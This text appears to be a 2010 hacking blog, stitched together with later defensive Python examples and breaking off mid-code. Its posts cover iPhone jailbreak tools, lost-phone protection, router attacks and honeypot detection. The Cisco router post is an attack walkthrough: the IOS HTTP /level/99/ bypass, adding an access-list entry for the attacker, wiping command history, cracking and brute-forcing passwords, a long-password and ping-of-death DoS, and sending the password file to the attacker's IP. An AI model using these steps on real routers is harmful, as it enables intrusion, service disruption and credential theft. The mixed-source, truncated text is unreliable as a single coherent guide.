Sunday, August 29, 2010

Jailbreaking / Hacking & Unlocking iPhones & iPods

Jailbreaking is the process of unlocking iPhone and iPod touch devices so that third-party applications can be installed. It also makes it possible to add ringtones or change the wallpaper on an iPhone, and it opens up the iPhone's file system so that it can be accessed from a computer.
Attackers use various techniques to jailbreak an iPod; once it is jailbroken, they can install malicious code or software that gives them access to the information on the device. Some of the tools used for jailbreaking include:

1. iDemocracy :
iDemocracy is an iPhone jailbreak and third-party app installation solution for the Windows platform. It installs Installer.app (for third-party apps and games), custom ringtones, and a SIM unlock. It also has newer features such as free ringtones on firmwares and file browsing.
Go here to know more : http://code.google.com/p/idemocracy/

2. iActivator :
iActivator is a Cocoa-based application for the Mac. It is a graphical interface providing iPhone activation/deactivation tools, and methods for breaking and restoring the jail.
Go here to know more : http://www.iphone-hacks.com/2007/07/

3. iNdependence :
iNdependence is a Cocoa-based application for Mac OS X which provides an interface for jailbreak, activation, SSH installation, and ringtone/wallpaper/application installation on your iPhone. It allows unauthorized third-party application installation on your iPhone.
Go here to know more : http://code.google.com/p/independence/

4. iFuntastic :
iFuntastic is an iPhone hacking and modification tool. It provides a GUI for almost any iPhone modification task: it can dig into your iPhone and edit images and logos, replace any system sound, and colour the iChat SMS balloons. It also has a full file browser, which lets you browse the iPhone's internal file system and edit UI images.
Go here to know more: http://www.tuaw.com/tag/iFuntastic/

5. AppSnapp :
AppSnapp is a tool for jailbreaking the iPhone and allowing the installation of non-sanctioned third-party applications. It jailbreaks the iPhone or iPod touch and pushes Installer.app to the device; Installer.app contains a catalog of native applications that can be installed directly over a WiFi or EDGE connection. It automates the process on iPhones running the supported software/firmware, and it can be completed purely on the iPhone without interacting with a Mac or Windows computer.
Go here to know more : http://jailbreakme.com/

6. iPhoneSimFree :
iPhoneSimFree is used to unlock the iPhone. It is also capable of completely restoring/repairing an iPhone "bricked" by a software unlock.
Go for detail : http://www.iphonesimfree.com/cgi-bin/iphonesimfree/engine.pl?page=home

7. anySIM :
anySIM is a GUI-based SIM unlocking solution for the iPhone. This application works only on VIRGIN 1.0.2 to 1.1.1 phones. It is described as fully automatic, needing only to be copied to a jailbroken iPhone and launched from the SpringBoard interface.
Go here to know more about it:
http://www.iphonestalk.com/anysim-v1-1-free-gui-based-sim-unlock-tool-for-virgin-iphone-os-v1-1-1-released/

Some people, after unlocking their iPhone or iPod, start installing genuine software provided by Apple. This can be a problem for all those who have unlocked or hacked their iPhones or iPods, because when you install any software provided by Apple, that software, before getting installed, checks whether the iPhone or iPod was unlocked; it may check whether you are using third-party software on your device, and if so, that software may lock your iPhone or iPod again, or it may inform Apple about it. However, I am not sure about this, but my friend and I think that this technique can be used by Apple to catch the culprits.

Hope you find this information lucrative. ;-)



Protect your stolen Mobile Phones


Sometimes, unfortunately, your mobile phone gets stolen or misplaced. If your phone is stolen and falls into a stranger's hands, it can be a great threat to you.


A mobile phone contains a lot of information: contact numbers, text messages (SMS), emails, and other data such as games, videos and music files. This information can be used by the thief or by whoever finds your phone. So we must know what to do if a mobile phone gets lost; that is what we discuss today.
First of all, avoid storing private or confidential information on your mobile phone. Many people save their bank account details, ATM PIN codes, emails and so on as text messages, in some other form, or on memory cards. Try to avoid such things. ;-)
Every mobile phone has a unique international code: the 15-digit International Mobile Equipment Identity (IMEI) number, which can be used to deactivate the phone. You must keep a record of this number. Usually it is printed on the box the phone came in. Write it down somewhere and keep it safe. Whenever your phone is lost or stolen, call your mobile operator and report the loss; the operator can then deactivate the phone using the IMEI number you provide.
However, this is of limited use, because the data on the phone can still be accessed, even though the phone will no longer be able to make calls, send SMS and so on.
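Since the advice is to write the IMEI down, here is a small check worth running on the number you recorded. This is an added example, not part of the original post: the 15th digit of an IMEI is a Luhn check digit, so a recorded number can be verified for typos and transposed digits long before it is ever needed. The sample IMEI in the block is constructed, not a real handset number.

```python
# Luhn check of a recorded IMEI (added example; not code from the post).

SAMPLE_IMEI = "352345012345677"   # constructed example, not a real handset's IMEI


def luhn_check_digit(payload: str) -> int:
    """Luhn check digit for a string of digits (for an IMEI, the first 14 digits)."""
    total = 0
    # Work from the right: the digit next to the check-digit position is doubled first.
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return (10 - total % 10) % 10


def normalize_imei(imei: str) -> str:
    """Strip the spaces and hyphens people type between IMEI groups."""
    return imei.replace(" ", "").replace("-", "")


def is_valid_imei(imei: str) -> bool:
    """True when the value is 15 digits and its last digit is the correct Luhn check digit.
    This only confirms the number was copied correctly, not that it belongs to a real handset."""
    digits = normalize_imei(imei)
    if len(digits) != 15 or not digits.isdigit():
        return False
    return luhn_check_digit(digits[:14]) == int(digits[14])


if __name__ == "__main__":
    for candidate in (SAMPLE_IMEI, "35-234501-234567-7", "352345012345678", "352345012345767"):
        print(candidate, "valid" if is_valid_imei(candidate) else "INVALID")
```

The last two candidates in the usage block are a wrong final digit and two transposed digits; both fail the check, which is what makes the check digit useful when the number has been copied by hand from the box.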

So there is an alternative: there is software available that can track your mobile phone. This feature is now built into many phones, but such software can provide the features listed below:

1. Locates your mobile phone using GPS.
2. Remotely locks the phone: you just need to send an SMS and the phone gets locked.
3. Remotely wipes all the data on the phone: you just send an SMS to delete all the data remotely.
4. SIM card change alert: receive an alert whenever the SIM card in your phone is changed.

All these features are provided by software. There are many such programs on the internet; search for them to learn more. I am providing a link to one of them, called Sprite Terminator:

http://spritesoftware.com/store/index.php?main_page=product_info&products_id=195

Friday, August 27, 2010

Hacking Cisco Router

A router is a layer 3 device used for LAN and WAN communication (mainly WAN communication). It operates at the network layer of the OSI model and uses IP addresses to send and receive information on the network.
This topic will be easier for readers who have some experience with routers. If you have no experience with routers, you may find this topic strange.
Why would we want to hack Cisco routers?
The reason is that Cisco is the Microsoft of routers: 60% of the routers in the world are Cisco's.
Routers are powerful devices with great speed, so if you get control over a router you can use it for many purposes, such as implementing DoS/DDoS attacks, hacking other systems, sniffing traffic, etc.
So our first task in hacking a Cisco router is to find a Cisco router on a network.
Finding a Cisco router is a fairly easy task: almost every ISP will route through at least one Cisco router. The easiest way to find a Cisco router is to run a traceroute from the Windows command prompt (type "tracert" followed by the IP address of anyone's computer or website). For example, in cmd type the following and hit Enter:
In cmd type the following & hit enter :

tracert www.facebook.com

Instead of facebook.com you can type any website address or IP address. You can trace pretty much anyone, because the trace will show all of the computer systems between your computer and theirs. One of these systems will probably have "cisco" in its name. If you find one like this, copy down its IP address.
Now you have the location of a Cisco router, but it may have a firewall protecting it, so check whether it is being blocked by pinging it a couple of times; if the ping is returned to you, it might not be blocked. Another way is to try to access some of the Cisco router's ports, which you can do simply with telnet by opening a connection to the router on port 23. If it asks for a password but no username, you are at the router; if it wants a username as well, you are probably at a firewall or it is using some other means of authentication.

Identifying a Cisco Router :

Some administrators configure the router in such a way that it is difficult to recognise as one.
Routers can be configured to look just like any other system on the network: they can run a web server, an SSH daemon, chargen, and they can even appear to be running multiple X servers. For this reason, they may often be mistaken for Unix systems.
Probably the easiest and most accurate way of identifying a host on the network as a router is to use Nmap, the venerable port scanner with very accurate OS fingerprinting. A port scan of a typical Cisco router shows the following:

Interesting ports on router:
7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001

If a login service such as telnet or SSH is accessible, one can simply use a standard telnet client and connect to the appropriate port. A basic Cisco router with IP 10.0.0.1 might look like the following:
C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Password:

The "User Access Verification" line is the characteristic Cisco telnet banner. Of course, one cannot rely on banners alone, since system administrators sometimes modify them for deceptive reasons; the banner can be changed with the banner motd command from global configuration mode of the router CLI.

Identifying Vulnerabilities :

Vulnerability scanners typically do a great job of identifying known vulnerabilities, but can often miss significant configuration errors. Nessus 2.0.6, for example, has a list of about 44 community strings with which to brute-force the SNMP daemon, which may be enough to catch the use of common default community strings such as public and private, but of course cannot take into account site-specific strings that might be in use.

Exploiting Vulnerabilities in Cisco IOS :

A vulnerability that affects most Cisco routers (when conditions are right) is the HTTP Configuration Arbitrary Administrative Access Vulnerability. This particular vulnerability should be found by all vulnerability scanners and is trivial to exploit; it often yields full remote administrative control of the affected router. The attacker's tool of choice is simply a web browser: the attacker enters the address of the router in the URL bar and hits Enter.
For example, if 10.0.0.1 is the router address, the attacker enters the following in the URL bar:

http://10.0.0.1

The attacker now gets a login dialogue box asking for a username and password. The attacker clicks the Cancel button and then enters the following as the address in the URL bar:

http:///level/xx/exec/

where xx is a number between 16 and 99.
For example, if 10.0.0.1 is the router address, the attacker enters the following URL into the address bar:
http://10.0.0.1/level/99/exec/show/config

This command presents the startup configuration of the device, which will look something like the following:

=================================================

Current configuration : 1204 bytes
!
version 12.2
no service password-encryption
!
hostname crypto
!
!
enable secret 5 $1$mERr$V3AzF/pAhvRvjIsUimrC8.
enable password ccna
!
username crypt0 7 05331F35754843001754
!
ip ssh version 1
!
interface FastEthernet0/0
ip address 10.0.0.1 255.0.0.0
duplex auto
speed auto
!
interface FastEthernet0/1
no ip address
duplex auto
speed auto
shutdown
!
interface Serial1/0
ip address 200.100.0.1 255.255.255.252
!
interface Serial1/1
no ip address
shutdown
!
interface Serial1/2
no ip address
shutdown
!
interface Serial1/3
no ip address
shutdown
!
router eigrp 50
network 10.0.0.0
network 200.100.0.0
no auto-summary
!
ip classless
ip route 20.0.0.0 255.255.255.192 Serial1/1
ip route 200.100.0.4 255.255.255.252 Serial1/1
ip route 30.0.0.0 255.255.192.0 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/0
ip route 30.0.0.0 255.255.192.0 Serial1/0
ip route 200.100.0.4 255.255.255.252 Serial1/0
ip route 20.0.0.0 255.255.255.192 Serial1/0
ip route 40.0.0.0 255.255.255.240 Serial1/0
ip route 50.0.0.0 255.240.0.0 Serial1/0
ip route 200.100.0.8 255.255.255.252 Serial1/0
!
!
banner motd ^C
hello^C
line con 0
line vty 0 4
password ccnp
login
!
!
end
=============================================

Now we can easily see the whole configuration of the router. We can study it to hack further into that router.

Cracking the passwords :

There are three methods IOS can use to represent a password in a router config file. They are:
1. Clear Text
2. Vigenere
3. MD5

In the case of clear text you will see something like this in the configuration:
enable password passwd

Here passwd is the password. In the configuration above you can see that the clear-text password is ccna.

In the case of Vigenere you will see something like the following in the configuration:
enable password 7 104B0718071B17

Here 104B0718071B17 is the encrypted password.

In the case of MD5 you will see something like the following:

enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0

Here $1$yOMG$38ZIcsEmMaIjsCyQM6hya0 is the hashed password. In the configuration above, $1$mERr$V3AzF/pAhvRvjIsUimrC8. is the hashed password.
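The three password forms just described are exactly what a defender should scan a saved configuration for, together with the services that make the URL trick above possible. The following Python audit is an added example, not code from the post: it takes a configuration as `show running-config` prints it (one-space indentation for sub-mode lines, which the flattened listing above has lost) and reports clear-text and type 7 credentials, a type 5 enable secret, SSH version 1, an enabled HTTP server, and vty lines that lack an access-class or still accept telnet. The weak sample is the relevant lines of the configuration shown above; the hardened counterpart is constructed, its $9$ values are placeholders rather than real hashes, and the finding codes are my own naming.

```python
# Audit of an IOS configuration for weak credential and service settings
# (added example; not code from the post).

# Relevant lines of the running-config shown in the post (hostname "crypto"),
# with the one-space indentation IOS uses for sub-mode statements.
WEAK_CONFIG = """\
version 12.2
no service password-encryption
!
hostname crypto
!
enable secret 5 $1$mERr$V3AzF/pAhvRvjIsUimrC8.
enable password ccna
!
username crypt0 7 05331F35754843001754
!
ip ssh version 1
!
line con 0
line vty 0 4
 password ccnp
 login
!
end
"""

# Hardened counterpart (constructed). $9$... values are placeholders, not real hashes.
HARDENED_CONFIG = """\
service password-encryption
hostname crypto
enable secret 9 $9$PLACEHOLDER_SCRYPT_HASH
username admin privilege 15 secret 9 $9$PLACEHOLDER_SCRYPT_HASH
no ip http server
ip ssh version 2
access-list 10 permit 10.0.0.2
line vty 0 4
 access-class 10 in
 transport input ssh
 login local
end
"""


def audit_ios_config(text):
    """Return a list of 'CODE: explanation' findings for weak settings in an IOS config."""
    findings = []
    section = None
    line_sections = {}   # 'line ...' header -> its indented child statements

    for raw in text.splitlines():
        stmt = raw.strip()
        if not stmt or stmt.startswith("!"):
            continue
        if raw.startswith(" "):                 # sub-mode statement of the current section
            if section in line_sections:
                line_sections[section].append(stmt)
            continue
        section = stmt
        if stmt.startswith("line "):
            line_sections[stmt] = []
        tokens = stmt.split()
        if stmt == "no service password-encryption":
            findings.append("CLEARTEXT-STORAGE: service password-encryption is off; line and enable passwords are stored as typed")
        elif stmt.startswith("enable password "):
            if tokens[2] == "7":
                findings.append("TYPE7-ENABLE: enable password uses the reversible type 7 encoding; use 'enable secret'")
            else:
                findings.append("CLEARTEXT-ENABLE: enable password is clear text; use 'enable secret'")
        elif stmt.startswith("enable secret 5 "):
            findings.append("MD5-SECRET: enable secret is type 5 (MD5-crypt); prefer type 8 or 9 where the IOS release supports them")
        elif tokens[0] == "username":
            if "7" in tokens[2:-1]:
                findings.append(f"TYPE7-USER: account '{tokens[1]}' has a reversible type 7 password")
            elif "password" in tokens and not any(t in ("5", "8", "9") for t in tokens[2:-1]):
                findings.append(f"CLEARTEXT-USER: account '{tokens[1]}' has a clear-text password")
        elif stmt == "ip http server":
            findings.append("HTTP-ADMIN: ip http server is enabled; this is the service behind the level/NN URL access shown in the post")
        elif stmt == "ip ssh version 1":
            findings.append("SSH-V1: SSH protocol version 1 is enabled; use 'ip ssh version 2'")

    for header, children in line_sections.items():
        for c in children:
            if c.startswith("password 7 "):
                findings.append(f"TYPE7-LINE: '{header}' uses a type 7 line password")
            elif c.startswith("password "):
                findings.append(f"CLEARTEXT-LINE: '{header}' has a clear-text line password")
        if header.startswith("line vty"):
            if not any(c.startswith("access-class ") for c in children):
                findings.append(f"VTY-NO-ACL: '{header}' has no access-class; remote logins are not source-restricted")
            transports = [c for c in children if c.startswith("transport input ")]
            if not transports or any("telnet" in t or t.endswith(" all") for t in transports):
                findings.append(f"VTY-TRANSPORT: '{header}' does not restrict transport to SSH; set 'transport input ssh'")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name}: {len(audit_ios_config(cfg))} finding(s)")
        for f in audit_ios_config(cfg):
            print("  ", f)
```

The vty check relies on the indentation that `show running-config` produces, so a configuration pasted without it (as in the listing above) will still report the top-level findings but cannot attribute `password ccnp` to `line vty 0 4`.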

Now that you know all about the password types, let's begin to crack them.
There is a way to easily reset the router password, but it needs physical access, so we are not going to discuss it; it is basically done from the router's ROMMON mode.
We will discuss the remote ways to crack the passwords.
In the case of a clear-text password you don't need to crack anything, because the password is already in clear text. lol ;-)
In the case of Vigenere the password is not strongly encrypted, so it can be cracked easily with a tool known as GetPass: you enter the encrypted password and it returns the clear-text password.
In the case of MD5 it is hard work. MD5 is a one-way hash, so it is difficult to crack.
So we do a dictionary attack or brute-force attack on this password by using tools like

However, it may not be possible to log in to the router even with valid login credentials if an ACL is configured on the router. There may be a chance that an ACL is preventing our access to the router. So we can create an ACL that grants us access, using the following command, typed as a URL:

http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR

In the command above 10.0.0.1 is the router's IP and 10.0.0.2 is our IP; replace 10.0.0.2 with your machine's IP address.
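Both the show/config request earlier and this access-list request go through the router's HTTP server and share one URL shape, /level/NN/exec or /level/NN/configure, so they are easy to recognise in traffic. The following Python detector is an added example, not the post's own tooling: it reads constructed log lines in Apache combined format (as a reverse proxy or IDS in front of the management network might record them; an IOS router does not write such logs itself) and flags any /level/ request whose level falls in the 16-99 range described above, while listing level-15 requests, the normal IOS web-admin URL, only as informational. On the router itself the fix is to disable the HTTP server where it is not needed (`no ip http server`) or, where it is needed, to have it authenticate against AAA (`ip http authentication aaa`) rather than the local enable password.

```python
# Detection of IOS /level/NN/ HTTP requests in proxy or IDS logs
# (added example; not code from the post).
import re

# URL shape used by the IOS web interface: /level/<privilege>/exec/... or /configure/...
LEVEL_URL = re.compile(r"/level/(\d{1,2})/(exec|configure)(?:/|$)", re.IGNORECASE)
# Apache combined-format request line: client, method, path, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not a real capture), as a proxy or IDS might record them.
SAMPLE_LOG = """\
10.0.0.2 - - [27/Aug/2010:10:01:02 +0000] "GET / HTTP/1.1" 401 0
10.0.0.2 - - [27/Aug/2010:10:01:09 +0000] "GET /level/99/exec/show/config HTTP/1.1" 200 1204
10.0.0.2 - - [27/Aug/2010:10:01:30 +0000] "GET /level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR HTTP/1.1" 200 0
10.0.0.7 - - [27/Aug/2010:10:05:00 +0000] "GET /level/15/exec/show/version HTTP/1.1" 200 2048
10.0.0.9 - - [27/Aug/2010:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""


def classify_request(path):
    """Return (kind, level, verb) for a /level/ URL, or None for anything else.
    Levels 16-99 are the bypass range; 1-15 are the normal IOS privilege levels."""
    m = LEVEL_URL.search(path)
    if not m:
        return None
    level, verb = int(m.group(1)), m.group(2).lower()
    kind = "BYPASS" if 16 <= level <= 99 else "ADMIN-URL"
    return (kind, level, verb)


def scan_log(text):
    """Return one alert dict per /level/ request found in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, path, status = m.groups()
        c = classify_request(path)
        if c is None:
            continue
        kind, level, verb = c
        alerts.append({"src": src, "method": method, "path": path, "kind": kind,
                       "level": level, "verb": verb, "succeeded": status == "200"})
    return alerts


def bypass_sources(alerts):
    """Distinct source addresses that issued a level 16-99 request."""
    return sorted({a["src"] for a in alerts if a["kind"] == "BYPASS"})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        state = "succeeded" if a["succeeded"] else "failed"
        print(f'{a["kind"]:9} level={a["level"]:2} {a["verb"]:9} from {a["src"]} ({state}): {a["path"]}')
    print("bypass sources:", bypass_sources(found))
```

A 200 response to a BYPASS request is the condition worth paging on: the 401 on the first line is the login dialogue the attacker cancels, and the subsequent 200s mean the router answered the privileged URL without credentials.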

Now we have access to log in to the router. So what do you do after you have got access to the router? We will discuss several experiments that you can perform on this powerful device.

1. Disable History :
Anyone can see what commands have been typed on the router CLI with the show history command, so we need to disable the history. It can be disabled with the following command in the router's privileged mode:

terminal history size 0

2. Cracking User accounts :

Sometimes there are user accounts on the router too. They can be seen in the configuration file; for example, in the configuration above we see a user named crypt0 and the password of that account. Depending on the encryption technique used for the password, we can crack it: if it is Vigenere we can use the GetPass tool to get the clear-text password, and if it is MD5 we can use a tool like Cain & Abel to crack the password of that account; then we can change the password of that account too. ;-) We can also create other users on the router.
The following command creates a new user. It is typed in global configuration mode of the router:

username crypto password test

Here crypto is the username and test is the password.
To delete the account, use the following command in global configuration mode of the router:

no username crypto

Here crypto is the username that you want to delete.


3. Brute-Forcing Login Services :

Brute-forcing login services such as Telnet and SSH can be somewhat harder and often noisier, but can also yield positive results for the attacker. One of the first things to do before conducting this type of attack on the router is to determine whether or not the router is using some type of extended authentication such as TACACS or RADIUS. Though IOS doesn't have any means of natively locking out users after X login attempts, lockouts can be enabled when authentication is passed off to another system via TACACS or RADIUS. The easiest way to tell whether authentication is being passed to another system is simply to connect to the router using a standard Telnet client.

C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Username:

If the device prompts for a username, you can almost be sure that it is using some form of extended authentication. In this case TACACS is implemented and brute-forcing is going to be more difficult, because the attacker will have to guess two variables, both the username and the password, instead of just the password. If finger is running, usernames can be gathered, but the chance of locking out a legitimate user account will likely stop most attackers from conducting this sort of attack. Of course, if you have permission to assess the site via "whatever means necessary", you might still want to conduct some brute-forcing up to the lockout threshold. If extended authentication is not in use, only a password is asked for, and the attacker can brute-force the Telnet daemon. Brutus is a Windows-based brute-forcing tool that handles a number of different protocols and can be customised for new protocols on the fly. THC's Hydra is also an excellent Unix-based tool that is very capable of brute-forcing a number of different services.
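The lockout question above has a logging side as well. When `login on-failure log` is configured (IOS 12.3(4)T and later), the router emits a %SEC_LOGIN-4-LOGIN_FAILED message for every failed Telnet or SSH login, naming the username tried and the source address, and the same release introduced `login block-for <seconds> attempts <n> within <seconds>`, which gives IOS a native quiet period after repeated failures. The Python below is an added example, not the post's: it parses constructed syslog lines in that message format and raises an alert for any source that fails more than a threshold of logins inside a sliding time window, listing the usernames it tried. The sample lines are constructed, and the parser assumes the message ends with the default `at HH:MM:SS TZ Day Mon DD YYYY` timestamp.

```python
# Sliding-window detection of login brute-forcing from IOS %SEC_LOGIN syslog
# (added example; not code from the post).
import re
from collections import defaultdict, deque
from datetime import datetime

# Body of an IOS 'login on-failure log' message.
FAILED_RE = re.compile(
    r"%SEC_LOGIN-4-LOGIN_FAILED: Login failed \[user: (?P<user>[^\]]*)\] "
    r"\[Source: (?P<src>[^\]]+)\] \[localport: (?P<port>\d+)\] "
    r"\[Reason: (?P<reason>[^\]]+)\] at (?P<ts>.+)$")

# Constructed sample syslog lines (not a real capture) in the shape IOS emits.
SAMPLE_SYSLOG = """\
Aug 27 10:20:30 rtr1 45: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:30 UTC Fri Aug 27 2010
Aug 27 10:20:33 rtr1 46: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:33 UTC Fri Aug 27 2010
Aug 27 10:20:37 rtr1 47: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:37 UTC Fri Aug 27 2010
Aug 27 10:20:41 rtr1 48: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: root] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:41 UTC Fri Aug 27 2010
Aug 27 10:20:45 rtr1 49: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:45 UTC Fri Aug 27 2010
Aug 27 10:20:50 rtr1 50: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: enable] [Source: 10.0.0.2] [localport: 23] [Reason: Login Authentication Failed] at 10:20:50 UTC Fri Aug 27 2010
Aug 27 10:22:00 rtr1 51: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.0.0.7] [localport: 22] [Reason: Login Authentication Failed] at 10:22:00 UTC Fri Aug 27 2010
Aug 27 10:25:00 rtr1 52: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ops] [Source: 10.0.0.5] [localport: 22] at 10:25:00 UTC Fri Aug 27 2010
"""


def parse_failed_login(line):
    """Return a dict for a LOGIN_FAILED line, or None for any other line."""
    m = FAILED_RE.search(line)
    if not m:
        return None
    # Timestamp tokens: HH:MM:SS TZ Day Mon DD YYYY; the zone and weekday are not needed.
    t = m["ts"].split()
    when = datetime.strptime(f"{t[0]} {t[3]} {t[4]} {t[5]}", "%H:%M:%S %b %d %Y")
    return {"user": m["user"], "src": m["src"], "port": int(m["port"]), "when": when}


def detect_bruteforce(text, attempts=5, within=60):
    """Alert on sources with >= `attempts` failed logins inside any `within`-second window.
    Returns {source: {"attempts": n_in_window, "users": [...], "last": datetime}}."""
    events = [e for e in map(parse_failed_login, text.splitlines()) if e]
    events.sort(key=lambda e: e["when"])
    windows = defaultdict(deque)     # source -> timestamps inside the current window
    users = defaultdict(set)         # source -> every username it has tried
    alerts = {}
    for e in events:
        q = windows[e["src"]]
        q.append(e["when"])
        users[e["src"]].add(e["user"])
        while (q[-1] - q[0]).total_seconds() > within:
            q.popleft()
        if len(q) >= attempts:
            alerts[e["src"]] = {"attempts": len(q), "users": sorted(users[e["src"]]), "last": e["when"]}
    return alerts


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_SYSLOG).items():
        print(f'{src}: {info["attempts"]} failures within 60s, usernames tried: {", ".join(info["users"])}')
```

The username list is the useful extra signal: a source cycling through admin, cisco, root and enable against a router that only prompts for a password is guessing, not mistyping.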

Old Technique of hacking routers :

Cisco routers running v4.1 software can easily be disabled. You simply connect to the router on port 23 through your proxy server and enter a HUGE password string, something like:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Now wait: the Cisco system might reboot, in which case you can't hack it because it is offline. But it will probably freeze up for a period of 2-10 minutes, which you must use to get in. If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks, like a huge ping.
Go to the command prompt and type:

ping -l 65550 10.0.0.1 -t

Here 10.0.0.1 is the router IP; replace it with the real IP of the router you are attacking. This will do the same trick for you.
While it is frozen, open up another connection to it from some other proxy and give the password "admin"; by default this is the router's password, and while it is temporarily disabled it reverts to its default state.
Now that you have logged in, you must acquire the password file. The systems run different software, but most will have a prompt like "htl-textil" or something; type "?" for a list of commands. You will see a huge list of commands, and somewhere in there you will find a transfer command. Use that to get the password file of admin (the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait for a call from the Cisco router. Once you send the file, HyperTerminal will ask whether you want to accept the file this machine is sending you; say yes and save it to disk.
Now that you have acquired the password file, you have to break it so you can access the router again. To do this, run a program like John the Ripper or Cain & Abel on the password file, and you may break it.


Hope you find it useful.

Sunday, August 22, 2010

Detecting Honeypots on networks


I have already discussed honeypots. Today we discuss the methods that can be used to detect the existence of honeypots on a network. If attackers are unaware of a honeypot, it can be a great problem for them, because the honeypot logs all of their activities.
So how can we detect whether the system we are interacting with is a honeypot or a real system? Following are some methods to detect honeypots.

1. Tar Pits :

A tarpit is a computer entity that will intentionally respond slowly to incoming requests. The goal is to delude clients so that unauthorized or illicit use of a fake service might be logged and slowed down. Note that some purists do not really consider a tarpit to be a honeypot, though it is certainly a fake information system resource that can delay any incoming aggressors. For example, to fight off spammers, some people run tarpits that look like open mail relays, but instead answer very slowly to SMTP commands. These are layer 7 tarpits. Other known tarpits are those that play with the TCP/IP stack in order to hold the incoming client's network socket open while forbidding any traffic over it (layer 4).

The Labrea Tarpit is an excellent example that plays with the TCP/IP stack and has been used to slow down the spread of worms over the Internet, but there are also others such as Honeyd and some native tools in Linux. For example, netfilter/iptables supports a TARPIT target. To achieve this tarpit state, iptables accepts an incoming TCP/IP connection and then immediately switches to a window size of zero. This prohibits the attacker from sending any more data. Any attempt to close the connection is ignored because no data can be sent by the attacker to the target. Therefore the connection remains active. This consumes resources on the attacker's system but not on the Linux server or the firewall running the tarpit. An example iptables rule for TARPIT mode looks like:

iptables -A INPUT -p tcp -m tcp --dport 80 -j TARPIT

Though tarpits are not built to avoid fingerprinting, this is an interesting technical case to propose for our first example.
For a layer 7 tarpit, by looking purely at the latency of the service, an attacker might guess after multiple attempts that he/she has found a fake system.
For a layer 4 tarpit like Labrea, the TCP window size is reduced to zero and the tarpit continues to acknowledge incoming packets. This simple signature will probably alert the attacker.
For example, in the following recording made with tcpdump you can see an attacker (10.0.0.2) trying to reach a fake web server simulated by Labrea in persistent mode (10.0.0.1):

03:26:01.435072 10.0.0.2.1330 > 10.0.0.1.80: S [tcp sum ok] 911245487:911245487(0) win 64240 (DF) (ttl 64, id 6969, len 48)
03:26:01.435635 10.0.0.1.80 > 10.0.0.2.1330: S [tcp sum ok] 3255338435:3255338435(0) ack 911245488 win 3 (ttl 255, id 48138, len 40)
03:26:01.435719 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:1(0) ack 1 win 64320 (DF) (ttl 128, id 4970, len 40)
03:26:01.435887 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:4(3) ack 1 win 64320 (DF) (ttl 128, id 4971, len 43)
03:26:01.436224 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 44321, len 40)
03:26:03.731433 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 4:5(1) ack 1 win 64320 (DF) (ttl 128, id 4973, len 41)
03:26:03.731673 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 35598, len 40)

By looking at the answers from 10.0.0.1, you will first notice a window size of 3 (win 3 in the SYN/ACK) and then 0 in the subsequent acknowledgements (win 0). You can then understand how an attacker could fingerprint this behaviour easily.
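To make the signature concrete, here is a parser for the tcpdump lines above. It is an added example, not from the post or from Labrea: it tracks each server endpoint opened by a SYN, records the window advertised in that server's SYN/ACK, counts the acknowledgements it sends with win 0, and marks the endpoint as a likely layer 4 tarpit when a tiny initial window is followed by zero-window acknowledgements. The 16-byte threshold is my own assumption. The second capture in the block, a normal web server answering with an ordinary window, is constructed for contrast; a honeypot operator can run this over a capture of their own tarpit to see the fingerprint the text describes.

```python
# Zero-window (layer 4 tarpit) fingerprint over tcpdump text output
# (added example; not code from the post or from Labrea).
import re

# Packet header: timestamp, src ip.port > dst ip.port: flags
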